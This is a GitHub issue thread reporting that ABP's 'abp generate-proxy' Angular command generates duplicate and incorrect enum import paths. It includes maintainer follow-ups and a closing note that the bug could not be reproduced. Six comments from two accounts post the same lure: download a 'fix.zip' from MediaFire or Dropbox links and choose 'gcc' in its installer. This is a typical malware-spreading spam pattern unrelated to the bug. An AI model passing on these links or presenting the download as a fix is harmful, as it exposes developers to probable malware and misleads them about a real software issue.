### ISSUE TITLE
Incorrect and Duplicate Import Paths Generated by abp generate-proxy Command

### ISSUE THREAD

**Issue by laghmariAm** [abpframework/abp#20621]
### Description

Hi ABP Team,

We are using ABP.IO in our .NETCore Angular project, and we have encountered an issue with the abp generate-proxy command when generating Angular proxies for our repositories.

Problem: The proxy generation command abp generate-proxy -t ng -m repo is generating duplicate and incorrect import paths. For example:
```ts
import type { EntityDto } from '@abp/ng.core';
import type { eG } from '../../../domain/shared/enums/e-gform-type.enum';
import type { eA, eC, eG, eV } from '../../../domain/shared/enums/models';
import type { eC} from '../../../domain/shared/enums/e-cda-document-level.enum';
import type { eA } from '../../../domain/shared/enums/e-administration-approach-site.enum';
import type { eV } from '../../../domain/shared/enums/e-vaccination-type.enum';
```

The line:
`import type { eA, eC, eG, eV } from '../../../domain/shared/enums/models';`
is incorrect because there is no models folder in the backend.

### Known Workarounds

Workaround: We are manually removing these incorrect lines every time the proxy is generated, which is not ideal.

### Version

8.1.4

Could you please let us know if this is a known issue or if there is something we can do to fix this? Any guidance or suggestions would be greatly appreciated.

Thank you!

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by willignicolas** [comment]
Any news about this proxy generation issue ? We can provide part of the api-definition endpoint result if needed.

Thanks for your help.

**Comment by masum-ulu** [comment]
Hi @laghmariAm can you provide models and AppServices for the re-produce error. Or if you have, can you send example project ? You can send to masum.ulu@volosoft.com mail

**Comment by masum-ulu** [comment]
Couldn't re-produce step. When the steps provided we can re-open
